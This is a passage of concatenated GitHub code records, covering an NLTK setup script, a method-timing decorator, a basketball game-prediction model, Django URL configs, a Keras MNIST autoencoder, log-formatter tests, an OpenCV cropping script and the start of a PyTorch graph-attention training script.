\"\"\"We have completed the initial setup for ntlk download.\n You can now run bigramft.py\"\"\"\n print('\\n', COMPLETE, '\\n')\n except Exception as error:\n print('There was an error: ', error)\nelse:\n EXIT_MSG = \"\"\"No worries we can have some bigram fun later when your ready to setup.\n Never rush quality!\"\"\"\n print(EXIT_MSG)\n","repo_name":"Yakelixir/bigram_from_text","sub_path":"nltk_setup.py","file_name":"nltk_setup.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1181040007","text":"import functools\nfrom datetime import datetime\nimport time\nfrom typing import Callable\n\n\ndef timer(cls, func: Callable, date_format: str) -> Callable:\n \"\"\"\n Декоратор класса.\n Выводит время создания инстанса класса.\n Выводит время работы функции или метода.\n \"\"\"\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n sample = date_format\n for sym in sample:\n if sym.isalpha():\n sample = sample.replace(sym, '%' + sym)\n\n print(f\"Запускается '{cls.__name__}.{func.__name__}'. Дата и время запуска: {datetime.now().strftime(sample)}\")\n start = time.time()\n result = func(*args, **kwargs)\n end = time.time()\n print(f\"Завершение '{cls.__name__}.{func.__name__}', время работы = {round(end - start, 3)} сек.\")\n return result\n\n return wrapped\n\n\ndef log_methods(date_format: str) -> Callable:\n \"\"\"\n Декоратор класса.\n Получает другой декоратор и применяет его ко всем методам в классе(класса).\n \"\"\"\n def decorate(cls):\n for method in dir(cls):\n if not method.startswith('__'):\n current_method = getattr(cls, method)\n decorated_method = timer(cls, current_method, date_format)\n setattr(cls, method, decorated_method)\n return cls\n\n return decorate\n\n\n@log_methods(\"b d Y - H:M:S\")\nclass A:\n def test_sum_1(self) -> int:\n print('test sum 1')\n number = 100\n result = 0\n for _ in range(number + 1):\n result += sum([i_num ** 2 for i_num in range(10000)])\n\n return result\n\n\n@log_methods(\"b d Y - H:M:S\")\nclass B(A):\n def test_sum_1(self):\n super().test_sum_1()\n print(\"Наследник test sum 1\")\n\n def test_sum_2(self):\n print(\"test sum 2\")\n number = 200\n result = 0\n for _ in range(number + 1):\n result += sum([i_num ** 2 for i_num in range(10000)])\n\n return result\n\n\nmy_obj = B()\nmy_obj.test_sum_1()\nmy_obj.test_sum_2()\n\n# зачет!\n","repo_name":"Mihalich2981/Python","sub_path":"Module29/03_format_logging/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73098474028","text":"import csv\nimport string\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\n\nclass Team():\n\n def __init__(self, team_name = \"League Average\", playoffs_year = 2020):\n\n team_statsheet = str(playoffs_year) + '_team_per_game_stats' + '.csv'\n opponent_statsheet = str(playoffs_year) + '_opp_team_per_game_stats' + '.csv'\n\n with open(team_statsheet) as file:\n team_stats = csv.reader(file)\n\n self.loaded_info = False\n\n for team in team_stats:\n name = team[1].replace('*','')\n if name == team_name:\n self.name = name\n self.minutes_played = float(team[3])\n self.field_goals_attempted = float(team[5])\n self.three_points_made = float(team[7])\n self.two_points_made = float(team[10])\n self.free_throws_made = float(team[13])\n self.free_throws_attempted = float(team[14])\n self.o_rebound = float(team[16])\n self.d_rebound = float(team[17])\n self.steals = float(team[20])\n self.blocks = float(team[21])\n self.turnovers = float(team[22])\n self.fouls = float(team[23])\n self.points = float(team[24])\n\n self.loaded_info = True\n\n if not self.loaded_info:\n print(\"Could not find team\")\n\n with open(opponent_statsheet) as file:\n opp_team_stats = csv.reader(file)\n\n self.loaded_info = False\n\n for team in opp_team_stats:\n name = team[1].replace('*','')\n if name == team_name:\n self.opp_field_goals_attempted = float(team[5])\n self.opp_three_points_made = float(team[7])\n self.opp_two_points_made = float(team[10])\n self.opp_free_throws_made = float(team[13])\n self.opp_free_throws_attempted = float(team[14])\n self.opp_o_rebound = float(team[16])\n self.opp_d_rebound = float(team[17])\n self.opp_steals = float(team[20])\n self.opp_turnovers = float(team[22])\n self.opp_fouls = float(team[23])\n self.opp_points = float(team[24])\n\n self.loaded_info = True\n\n if not self.loaded_info:\n print(\"Could not find team matchups\")\n\n self.offensive_eFG = (self.two_points_made + 1.5 * self.three_points_made) / self.field_goals_attempted\n self.defensive_eFG = (self.opp_two_points_made + 1.5 * self.opp_three_points_made) / self.opp_field_goals_attempted\n\n self.offensive_TOV_rate = self.turnovers / (self.field_goals_attempted + .44 * self.free_throws_attempted + self.turnovers)\n self.defensive_TOV_rate = self.opp_turnovers / (self.opp_field_goals_attempted + .44 * self.opp_free_throws_attempted + self.opp_turnovers)\n\n self.free_throw_rate = self.free_throws_made / self.free_throws_attempted\n\n self.o_rebound_rating = self.o_rebound / (self.o_rebound + self.opp_d_rebound)\n self.opp_o_rebound_rating = self.opp_o_rebound / (self.d_rebound + self.opp_o_rebound)\n self.d_rebound_rating = 1 - self.opp_o_rebound_rating\n\n #Four Factors\n self.shooting_factor = self.offensive_eFG - self.defensive_eFG\n self.turnover_factor = self.defensive_TOV_rate - self.offensive_TOV_rate\n self.rebounding_factor = self.o_rebound_rating - self.opp_o_rebound_rating\n self.free_throw_factor = self.free_throw_rate\n\n self.net_rating = self.shooting_factor * .4 * 100 + self.turnover_factor * .25 * 100 + self.rebounding_factor * .2 * 100 + self.free_throw_factor * .15\n # Note: net_rating is roughly accurate, but too severely penalizes team focused on shooting such as the Rockets and the Thunder while\n # inflating teams who score in the paint such as the 76ers and the Lakers\n\n # self.defensive_rating = (self.defensive_TOV_rate * 100 * .25 + self.d_rebound_rating * 100 * .25 - self.defensive_eFG * 100 * .4 + (self.steals + self.blocks) / (self.opp_field_goals_attempted + self.opp_turnovers) * 100 * .1)\n self.defensive_rating = (self.defensive_TOV_rate * 100 * .30 + self.d_rebound_rating * 100 * .20 - self.defensive_eFG * 100 * .4 + (self.steals + self.blocks) / (self.opp_field_goals_attempted + self.opp_turnovers) * 100 * .1) + 4\n self.offensive_rating = (self.offensive_eFG * 100 * .4 + self.o_rebound_rating * 100 * .20 + self.free_throw_rate * 100 * .05 - self.offensive_TOV_rate * 100 * .25) / 8\n # Defensive rating ranks teams properly, but scale seems difficult to manage\n # Offensive rating seems to have very limited use\n\n self.game_pace = self.field_goals_attempted + self.opp_field_goals_attempted\n self.shooting_possessions = (1 / (1 - self.o_rebound_rating)) / ((1 / (1 - self.o_rebound_rating)) + (1 / (1 - self.opp_o_rebound_rating))) * self.game_pace + (self.steals - self.opp_steals) - (self.turnovers - self.opp_turnovers) * (18 / 21) - (self.fouls - self.opp_fouls) / 4\n\n self.calculated_ppg = self.shooting_possessions * self.offensive_eFG * 2 + self.free_throws_made\n # self.calculated_ppg = self.field_goals_attempted * self.offensive_eFG * 2 + self.free_throws_made\n # different ways to calculate ppg\n\n #for diagnostics\n self.shooting_possessions_diff = self.field_goals_attempted - self.shooting_possessions\n self.calculated_ppg_diff = self.points - self.calculated_ppg\n # appears as if I am overrating the good teams and underrating the bad ones\n # implementing a defensive factor into the calculated PPG might help\n\n def __str__(self):\n # return(\"Team stats for {}\".format(self.name))\n # return(\" Calculated PPG Difference: {}, Shooting Posessions Difference: {}\".format(self.calculated_ppg_diff, self.shooting_possessions_diff))\n return (\" Net Rating: {}\".format(self.net_rating))\n\ndef generate_teams():\n\n team_dict = dict()\n\n with open('team_per_game_stats_2020.csv') as file:\n teams = csv.DictReader(file)\n for team in teams:\n team_name = team['Team'].replace(\"*\",'')\n mascot = team_name.split()[-1]\n team_dict[mascot] = Team(team_name)\n\n return team_dict\n\ndef sort_teams(team_dict):\n\n team_ranking = {key: value for key, value in sorted(team_dict.items(), key=lambda item: item[1].net_rating, reverse=True)}\n\n return team_ranking\n\ndef calculate_defensive_factor_ratio(team_dict):\n\n defensive_rating = []\n opponent_points = []\n\n for team in team_dict.values():\n defensive_rating.append(team.defensive_rating)\n opponent_points.append(float(team.opp_points/team.minutes_played - team_dict['Average'].opp_points/team_dict['Average'].minutes_played) * 240)\n\n x = np.array(defensive_rating).reshape(-1,1)\n y = np.array(opponent_points)\n\n model = LinearRegression().fit(x, y)\n # model = LinearRegression(fit_intercept=False).fit(x, y)\n\n r_sq = model.score(x,y)\n intercept = model.intercept_\n slope = model.coef_\n\n # print('Points Scored Difference = {} * Defensive Rating + {}'.format(slope, intercept))\n return r_sq, intercept, slope\n\ndef calculate_matchup_points(team1, team2):\n # Without factoring in OT minutes: Points Scored Difference = [-2.71860127] * Defensive Rating + 9.201332686838144\n # Factoring in OT Minutes: Points Scored Difference = [-2.57157722] * Defensive Rating + 8.712697490051784\n\n game_pace = team1.field_goals_attempted + team2.field_goals_attempted\n\n # Team 1\n team1_shooting_possessions = (1 / (1 - team1.o_rebound_rating)) / ((1 / (1 - team1.o_rebound_rating)) + (1 / (1 - team2.opp_o_rebound_rating))) * game_pace + (team1.steals - team2.opp_steals) - (team1.turnovers - team2.opp_turnovers) * (18 / 21) - (team1.fouls - team2.opp_fouls) / 4\n team2_defense_effect = -2.57157722 * team2.defensive_rating + 8.712697490051784\n team1_game_points = team1.shooting_possessions * team1.offensive_eFG * 2 + team1.free_throws_made + team2_defense_effect\n # team1_game_points = team1.field_goals_attempted * team1.offensive_eFG * 2 + team1.free_throws_made + team2_defense_effect\n\n # print(\"{} shooting possessions: {}\".format(team1.name, team1_shooting_possessions))\n # print(\"{} defense effect: {}\".format(team2.name, team2_defense_effect))\n # print(\"{} game points: {}\".format(team1.name, team1_game_points))\n\n # Team 2\n team2_shooting_possessions = (1 / (1 - team2.o_rebound_rating)) / ((1 / (1 - team1.o_rebound_rating)) + (1 / (1 - team2.opp_o_rebound_rating))) * game_pace + (team2.steals - team1.opp_steals) - (team2.turnovers - team1.opp_turnovers) * (18 / 21) - (team2.fouls - team1.opp_fouls) / 4\n team1_defense_effect = -2.57157722 * team1.defensive_rating + 8.712697490051784\n team2_game_points = team2.shooting_possessions * team2.offensive_eFG * 2 + team2.free_throws_made + team1_defense_effect\n # team2_game_points = team2.field_goals_attempted * team2.offensive_eFG * 2 + team2.free_throws_made + team1_defense_effect\n\n # print(\"{} shooting possessions: {}\".format(team2.name, team2_shooting_possessions))\n # print(\"{} defense effect: {}\".format(team1.name, team1_defense_effect))\n # print(\"{} game points: {}\".format(team2.name, team2_game_points))\n\n total_game_points = team1_game_points + team2_game_points\n\n if team1_game_points > team2_game_points:\n winner = team1.name\n loser = team2.name\n spread = team2_game_points - team1_game_points\n winner_points = team1_game_points\n loser_points = team2_game_points\n else:\n winner = team2.name\n loser = team1.name\n spread = team1_game_points - team2_game_points\n winner_points = team2_game_points\n loser_points = team1_game_points\n\n return winner, loser, spread, winner_points, loser_points\n\ndef calculate_matchup_FF_spread(team1, team2):\n\n game_pace = team1.field_goals_attempted + team2.field_goals_attempted\n\n # Team 1\n team1_shooting_possessions = (1 / (1 - team1.o_rebound_rating)) / ((1 / (1 - team1.o_rebound_rating)) + (1 / (1 - team2.opp_o_rebound_rating))) * game_pace + (team1.steals - team2.opp_steals) - (team1.turnovers - team2.opp_turnovers) * (18 / 21) - (team1.fouls - team2.opp_fouls) / 4\n team2_defense_effect = -2.57157722 * team2.defensive_rating + 8.712697490051784\n team1_game_points = team1.shooting_possessions * team1.offensive_eFG * 2 + team1.free_throws_made + team2_defense_effect\n # team1_game_points = team1.field_goals_attempted * team1.offensive_eFG * 2 + team1.free_throws_made + team2_defense_effect\n\n # print(\"{} shooting possessions: {}\".format(team1.name, team1_shooting_possessions))\n # print(\"{} defense effect: {}\".format(team2.name, team2_defense_effect))\n # print(\"{} game points: {}\".format(team1.name, team1_game_points))\n\n # Team 2\n team2_shooting_possessions = (1 / (1 - team2.o_rebound_rating)) / ((1 / (1 - team1.o_rebound_rating)) + (1 / (1 - team2.opp_o_rebound_rating))) * game_pace + (team2.steals - team1.opp_steals) - (team2.turnovers - team1.opp_turnovers) * (18 / 21) - (team2.fouls - team1.opp_fouls) / 4\n team1_defense_effect = -2.57157722 * team1.defensive_rating + 8.712697490051784\n team2_game_points = team2.shooting_possessions * team2.offensive_eFG * 2 + team2.free_throws_made + team1_defense_effect\n # team2_game_points = team2.field_goals_attempted * team2.offensive_eFG * 2 + team2.free_throws_made + team1_defense_effect\n\n # print(\"{} shooting possessions: {}\".format(team2.name, team2_shooting_possessions))\n # print(\"{} defense effect: {}\".format(team1.name, team1_defense_effect))\n # print(\"{} game points: {}\".format(team2.name, team2_game_points))\n\n total_game_points = team1_game_points + team2_game_points\n\n # ff_spread = ((team1.shooting_factor - team2.shooting_factor) * .4 + (team1.turnover_factor - team2.turnover_factor) * .25 + (team1.rebounding_factor - team2.rebounding_factor) * .2 + (team1.free_throw_rate - team2.free_throw_rate) * 100 * .15) * 2\n # print(\"Team1 net rating: {}\".format(team1.net_rating))\n # print(\"Team2 net rating: {}\".format(team2.net_rating))\n ff_spread = (team1.net_rating - team2.net_rating) * 2\n # print(\"ff_spread: {}\".format(ff_spread))\n\n if ff_spread > 0:\n winner = team1.name\n loser = team2.name\n spread = -1 * ff_spread\n winner_points = (total_game_points - ff_spread) / 2 + ff_spread\n loser_points = (total_game_points - ff_spread) / 2\n else:\n winner = team2.name\n loser = team1.name\n spread = ff_spread\n winner_points = (total_game_points + ff_spread) / 2 - ff_spread\n loser_points = (total_game_points + ff_spread) / 2\n\n return winner, loser, spread, winner_points, loser_points\n\ndef testing_schedule(year = 2020, month = 'february'):\n\n schedule_name = month + '_schedule_' + str(year) + '.csv'\n\n test_result = dict()\n test_result['right'] = 0\n test_result['wrong'] = 0\n\n spread_difference = list()\n\n point_total_difference = list()\n\n team_dict = generate_teams()\n\n with open(schedule_name) as schedule:\n matchup_reader = csv.reader(schedule)\n next(matchup_reader)\n\n for matchup in matchup_reader:\n visiting_team = matchup[2]\n visiting_team_points = matchup[3]\n home_team = matchup[4]\n home_team_points = matchup[5]\n actual_point_total = int(visiting_team_points) + int(home_team_points)\n\n if visiting_team_points > home_team_points:\n win = visiting_team\n loss = home_team\n actual_spread = int(visiting_team_points) - int(home_team_points)\n winner_points = visiting_team_points\n loser_points = home_team_points\n else:\n win = home_team\n loss = visiting_team\n actual_spread = int(home_team_points) - int(visiting_team_points)\n winner_points = home_team_points\n loser_points = visiting_team_points\n\n visitor_mascot = visiting_team.split()[-1]\n home_mascot = home_team.split()[-1]\n visitors = team_dict[visitor_mascot]\n home = team_dict[home_mascot]\n\n # predicted_winner, predicted_loser, predicted_spread, predicted_winner_points, predicted_loser_points = calculate_matchup_points(visitors, home)\n predicted_winner, predicted_loser, predicted_spread, predicted_winner_points, predicted_loser_points = calculate_matchup_FF_spread(visitors, home)\n predicted_point_total = predicted_winner_points + predicted_loser_points\n\n if predicted_winner == win:\n test_result['right'] += 1\n else:\n test_result['wrong'] += 1\n predicted_spread = -1 * predicted_spread\n\n spread_difference.append(actual_spread - predicted_spread)\n point_total_difference.append(actual_point_total - predicted_point_total)\n\n correct_percentage = test_result['right'] / (test_result['right'] + test_result['wrong']) * 100\n average_spread_difference = sum(spread_difference) / len(spread_difference)\n average_point_total_difference = sum(point_total_difference) / len(point_total_difference)\n\n return correct_percentage, average_spread_difference, average_point_total_difference\n","repo_name":"colwang/basketball-model","sub_path":"CSV Model/basic_model_functions.py","file_name":"basic_model_functions.py","file_ext":"py","file_size_in_byte":15678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14553656776","text":"'''\nCreated on Aug 29, 2017\n\n@author: kenng\n'''\n#from django.conf.urls import url\napp_name = 'polls'\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n #url(r'^$', views.index, name='index'),\n # ex: /polls/\n path('', views.index, name='index'),\n # ex: /polls/5/\n path('/', views.detail, name='detail'),\n # ex: /polls/5/results/\n path('/results/', views.ResultsView.as_view(), name='results'),\n # ex: /polls/5/vote/\n path('/vote/', views.vote, name='vote'),\n]","repo_name":"kent5i5/kitsportfolio","sub_path":"polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33688866869","text":"#----------------------- -------------------------------------\n# coding:utf-8\n#------------------------------------------------------------\n#\tUpdata History\n#\tDecember 06 16:00, 2018 (Thu) by S.Iwamaru\n#------------------------------------------------------------\n#\n#\tDeepAutoEncoder\n#\t\thttps://blog.keras.io/building-autoencoders-in-keras.html\n#------------------------------------------------------------\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom keras.layers import Input, Dense\nfrom keras.models import Model\nfrom keras.datasets import mnist\nfrom keras.utils import plot_model\n\n\"\"\"\n\tモデル生成\n\"\"\"\ninput_img = Input(shape=(784,))\n\n# Encode部分\nencoded = Dense(128, activation=\"relu\")(input_img)\nencoded = Dense(64, activation=\"relu\")(encoded)\nencoded = Dense(32, activation=\"relu\")(encoded)\n\n# Decode部分\ndecoded = Dense(64, activation=\"relu\")(encoded)\ndecoded = Dense(128, activation=\"relu\")(decoded)\ndecoded = Dense(784, activation=\"sigmoid\")(decoded)\n\n# Model\nautoencoder = Model(input_img, decoded)\nautoencoder.compile(optimizer=\"adadelta\",\n\t\t\t\t\tloss=\"binary_crossentropy\")\n\n# アーキテクチャの可視化\nplot_model( autoencoder, to_file=\"architecture.png\" )\n\n\"\"\"\n\tデータ読み込み\n\"\"\"\n(x_train, _), (x_test, _) = mnist.load_data()\n\nx_train = x_train.astype(\"float32\") / 255.\nx_test = x_test.astype(\"float32\") / 255.\nx_train = x_train.reshape((len(x_train), np.prod(x_train.shape[1:])))\nx_test = x_test.reshape((len(x_test), np.prod(x_test.shape[1:])))\n\nepochs = 100\nbatch_size = 256\n\nautoencoder.fit( x_train, x_train,\n\t\tepochs=epochs,\n\t\tbatch_size=batch_size,\n\t\tshuffle=True,\n\t\tvalidation_data=(x_test, x_test))\n\t\t\t\t \n\"\"\"\n\tデータの可視化\n\"\"\"\ndecoded_imgs = autoencoder.predict(x_test)\n\nn = 10\nplt.figure(figsize=(20, 4))\nfor i in range(n):\n\t# display original\n\tax = plt.subplot(2, n, i + 1)\n\tplt.imshow(x_test[i].reshape(28, 28))\n\tplt.gray()\n\tax.get_xaxis().set_visible(False)\n\tax.get_yaxis().set_visible(False)\n\t\n\tax = plt.subplot(2, n, i + 1 + n)\n\tplt.imshow(decoded_imgs[i].reshape(28, 28))\n\tplt.gray()\n\tax.get_xaxis().set_visible(False)\n\tax.get_yaxis().set_visible(False)\nplt.show()\n","repo_name":"Shimpei-GANGAN/AutoEncoder-DenoisingAE","sub_path":"DeepAE.py","file_name":"DeepAE.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22612614417","text":"# -*- coding: utf-8 -*-\n\n'''\nCreated on 16.04.15\n\n@author = mharder\n'''\n\n\nimport six\n\nfrom bonfire.formats import tail_format, dump_format\nfrom bonfire.graylog_api import Message\nimport arrow\n\n\ndef test_dump_format():\n ts = arrow.get()\n ts_str = ts.to('local').format(\"YYYY-MM-DD HH:mm:ss.SS\")\n formatter = dump_format([\"a\", \"b\", \"c\"])\n\n assert formatter(Message({\"timestamp\": ts, \"message\": {}})) == \"{};'';'';''\".format(ts_str)\n assert formatter(Message({\"timestamp\": ts, \"message\": {\"a\": \"d\"}})) == \"{};'d';'';''\".format(ts_str)\n assert formatter(Message({\"timestamp\": ts, \"message\": {\"a\": \"d\", \"b\": \"e\", \"c\": \"f\"}})) == \"{};'d';'e';'f'\".format(ts_str)\n assert formatter(Message({\"timestamp\": ts, \"message\": {\"a\": \"d\", \"b\": \"e\", \"c\": \"f\", \"g\": \"h\"}})) == \"{};'d';'e';'f'\".format(ts_str)\n\n\ndef test_tail_format():\n arrow_time = arrow.get()\n timestamp = arrow_time.to('local').format(\"YYYY-MM-DD HH:mm:ss.SS\")\n\n message = {\n \"message\": \"Hällo Wörld, Здравствулте мир, γειά σου κόσμος\",\n \"source\": \"a\",\n \"level\": 2,\n \"facility\": \"b\",\n \"line\": 10,\n \"module\": \"c\",\n \"timestamp\": arrow_time\n }\n\n default_formatter = tail_format([\"message\"])\n default_expected_result = f\"{timestamp} '{message['message']}'\"\n assert default_formatter(Message({\"message\": message})) == default_expected_result\n\n source_formatter = tail_format([\"message\", \"source\"])\n source_expected_result = f\"{timestamp} '{message['message']}' '{message['source']}'\"\n assert source_formatter(Message({\"message\": message})) == source_expected_result\n\n varied_formatter = tail_format([\"line\", \"source\", \"level\"])\n varied_expected_result = f\"{timestamp} '{message['line']}' '{message['source']}' '{message['level']}'\"\n assert varied_formatter(Message({\"message\": message})) == varied_expected_result\n\n\n colorful_default_formatter = tail_format([\"message\"], True)\n colors = [\"\\x1b[41m\\x1b[37m\", \"\\x1b[31m\", \"\\x1b[33m\", \"\\x1b[32m\", \"\\x1b[32m\", \"\\x1b[34m\"]\n\n def do_colorful_test(formatter, message, expected_result, level):\n message[\"level\"] = level\n assert formatter(Message({\"message\": message})) == expected_result\n\n for level in range(2,8):\n expected_result = \"{}{} '{}'\\x1b[0m\".format(colors[level-2], timestamp, message['message'])\n do_colorful_test(colorful_default_formatter, message, expected_result, level)\n","repo_name":"blue-yonder/bonfire","sub_path":"tests/test_formats.py","file_name":"test_formats.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"37"} +{"seq_id":"32035719290","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.HomeView.as_view(), name=\"home\"),\n path(\"songs/\", views.SongsView.as_view(), name=\"songs\"),\n path(\"songs/create/\", views.CreateSongsView.as_view(), name=\"add_song\"),\n path(\"songs//update/\", views.UpdateSongsView.as_view(), name=\"update_song\"),\n # path(\"songs//update/\", views.UpdateSongsView.as_view(), name=\"update_song\"),\n path(\"songs//delete/\", views.DeleteSongsView.as_view(), name=\"delete_song\"),\n path(\"songs/search//\", views.song_search_view, name=\"song_search\"),\n # path(\"songs//details/\", views.SongDetailsView.as_view(), name=\"song_details\"),\n\n path(\"artists/\", views.ArtistsView.as_view(), name=\"artists\"),\n path(\"artists/create/\", views.CreateArtistsView.as_view(), name=\"add_artist\"),\n path(\"artists//update/\", views.UpdateArtistsView.as_view(), name=\"update_artist\"),\n path(\"artists//delete/\", views.DeleteArtistsView.as_view(), name=\"delete_artist\"),\n path(\"artists/search//\", views.artist_search_view, name=\"artist_search\"),\n\n path(\"albums/\", views.AlbumsView.as_view(), name=\"albums\"), \n path(\"albums/create/\", views.CreateAlbumsView.as_view(), name=\"add_album\"),\n path(\"albums//update/\", views.UpdateAlbumsView.as_view(), name=\"update_album\"),\n path(\"albums//delete/\", views.DeleteAlbumsView.as_view(), name=\"delete_album\"),\n\n]","repo_name":"festus-kogo/artists","sub_path":"artistsapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19762416753","text":"import cv2\n\n# Load image\n#center_image = cv2.cvtColor(cv2.imread('./IMG/center_2016_12_01_13_30_48_287.jpg'), cv2.COLOR_BGR2RGB)\ncenter_image = cv2.imread('./IMG/center_2016_12_01_13_30_48_287.jpg') #convertion to rgb messes it up here but required in drive.py\n\n# Trim image upper side\nFROM_TOP = 60\nFROM_BOTTOM = 20\noutput = center_image[0 + FROM_TOP : 160 - FROM_BOTTOM, 0 : 320, 0 : 3]\n\n# Save image\n#cv2.imwrite('./IMG/center_cropped.jpg', output) \n\n### ------------------------------------------------------------\n\nnew_size_x, new_size_y = 200, 66\nold_size_x, old_size_y = 320, 160\n\ncenter2 = cv2.imread('./IMG/center_2016_12_01_13_30_48_287.jpg')\nFROM_TOP = 60\nFROM_BOTTOM = 20\n\noutput2 = center2[0 + FROM_TOP : old_size_y - FROM_BOTTOM, 0 : old_size_x, 0 : 3]\n\noutput2 = cv2.resize(output2, (new_size_x, new_size_y), interpolation = cv2.INTER_AREA)\ncv2.imwrite('./IMG/center_cropped.jpg', output2) \n\n### ------------------------------------------------------------\n# Test drive.py\nimport base64\nfrom PIL import Image\nfrom io import BytesIO\n\n#image = Image.open(BytesIO(base64.b64decode(imgString)))\nimage = Image.open('./IMG/center_2016_12_01_13_30_48_287.jpg')\n# left, upper, righ, lower\nimage = image.crop((0, FROM_TOP, 320, 160 - FROM_BOTTOM))\nimage = image.resize((200, 66))\n\n# left, left + width, upper, upper+height\nimage.save('./IMG/center_cropped_drivepy.jpg')\n#image_array = np.asarray(image)\n\n\n","repo_name":"drugescu/behavioral_cloning","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43586054678","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport glob\nimport sys\nimport time\nimport random\nimport argparse\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nfrom utils import load_data, accuracy, statics, load_dataset\nfrom models import GAT, SpGAT, GConvAT, CNNBaseline, BrainDecode\n\n# Training settings\nparser = argparse.ArgumentParser()\nparser.add_argument('--no-cuda', action='store_true', default=False, help='Disables CUDA training.')\nparser.add_argument('--fastmode', action='store_true', default=False, help='Validate during training pass.')\nparser.add_argument('--no-log', action='store_true', default=False, help='Print to stdout or log file')\nparser.add_argument('--sparse', action='store_true', default=False, help='GAT with sparse version or not.')\nparser.add_argument('--seed', type=int, default=72, help='Random seed.')\nparser.add_argument('--epochs', type=int, default=1000, help='Number of epochs to train.')\nparser.add_argument('--batch', type=int, default=64, help='Number of samples in a mini batch.')\nparser.add_argument('--lr', type=float, default=0.001, help='Initial learning rate.')\nparser.add_argument('--weight_decay', type=float, default=5e-4, help='Weight decay (L2 loss on parameters).')\nparser.add_argument('--hidden', type=int, default=4, help='Number of hidden units.')\nparser.add_argument('--nb_heads', type=int, default=4, help='Number of head attentions.')\nparser.add_argument('--dropout', type=float, default=0.1, help='Dropout rate (1 - keep probability).') # this is important\nparser.add_argument('--alpha', type=float, default=0.2, help='Alpha for the leaky_relu.')\nparser.add_argument('--patience', type=int, default=100, help='Patience')\n\nargs = parser.parse_args()\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\n\nrandom.seed(args.seed)\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\nif args.cuda:\n torch.cuda.manual_seed(args.seed)\n args.device = torch.device('cuda:0')\n torch.cuda.set_device(0)\nelse:\n args.device = torch.device('cpu')\n\n\ndef train(epoch):\n batch = args.batch\n output_epoch = []\n loss_epoch = []\n t = time.time()\n model.train()\n for idx in range(0, len(x_train), batch):\n features = Variable(torch.FloatTensor(x_train[idx:idx+batch])).to(args.device)\n adj = Variable(torch.FloatTensor(np.ones([features.shape[0], features.shape[1], features.shape[1]]))).to(args.device)\n labels = Variable(torch.LongTensor(y_train[idx:idx+batch])).to(args.device)\n optimizer.zero_grad()\n # forward\n output = model(features, adj)\n #output_epoch.append(output.data.numpy())\n output = output.view(-1, 2)\n labels = labels.view(-1)\n\n # backward\n loss_train = F.nll_loss(output, labels)\n loss_epoch.append(loss_train.data.item())\n acc_train = accuracy(output, labels)\n loss_train.backward()\n optimizer.step()\n if int(idx/batch) % 10 ==0: # print log per 10 batches\n print(\n 'Batch {:d}'.format(int(idx/batch)+1),\n 'loss_train: {:.4f}'.format(loss_train.data.item()),\n 'acc_train: {:.4f}'.format(acc_train.data.item()),\n file=log_file,\n flush=True\n )\n\n # test\n features = Variable(torch.FloatTensor(x_test)).to(args.device)\n adj = Variable(torch.FloatTensor(np.ones([features.shape[0], features.shape[1], features.shape[1]]))).to(args.device)\n labels = Variable(torch.LongTensor(y_test)).to(args.device)\n\n if not args.fastmode:\n # Evaluate validation set performance separately,\n # deactivates dropout during validation run.\n model.eval()\n output = []\n for idx in range(0, len(x_test), batch):\n features_ = features[idx:idx+batch]\n adj_ = adj[idx:idx+batch]\n output.append(model(features_, adj_).detach())\n output = torch.cat(output, dim=0)\n\n output = output.view(-1, 2)\n labels = labels.view(-1)\n loss_val = F.nll_loss(output, labels)\n acc_val = accuracy(output, labels)\n print('Epoch: {:04d}'.format(epoch+1),\n 'loss_train: {:.4f}'.format(np.mean(np.array(loss_epoch))),\n '-- loss_val: {:.4f}'.format(loss_val.data.item()),\n 'acc_val: {:.4f}'.format(acc_val.data.item()),\n 'time: {:.4f}s'.format(time.time() - t),\n file=log_file,\n flush=True\n )\n\n return -acc_val.data.item()\n\n\ndef compute_test():\n features = Variable(torch.FloatTensor(x_test)).to(args.device)\n adj = Variable(torch.FloatTensor(np.ones([features.shape[0], features.shape[1], features.shape[1]]))).to(args.device)\n labels = Variable(torch.LongTensor(y_test)).to(args.device)\n\n model.eval()\n output = model(features, adj)\n output = output.view(-1, 2).detach()\n labels = labels.view(-1)\n loss_test = F.nll_loss(output, labels)\n tp, tn, fp, fn = statics(output, labels)\n print(\"Test set results:\",\n \"loss= {:.4f}\".format(loss_test.data.item()),\n \"accuracy= {:.4f}\".format((tp + tn) / (tp + fp + tn + fn)),\n \"sensitivity= {:.4f}\".format(tp / (tp + fn)),\n \"specificity= {:.4f}\".format(tn / (tn + fp)),\n file=log_file,\n flush=True\n )\n\nif __name__=='__main__':\n # Load data\n X, Y = load_dataset(args.seed)\n split_rate = 0.8\n x_train = X[0:int(split_rate * X.shape[0])]\n x_test = X[int(split_rate * X.shape[0]):]\n\n y_train = Y[0:int(split_rate * Y.shape[0])]\n y_test = Y[int(split_rate * Y.shape[0]):]\n\n features = 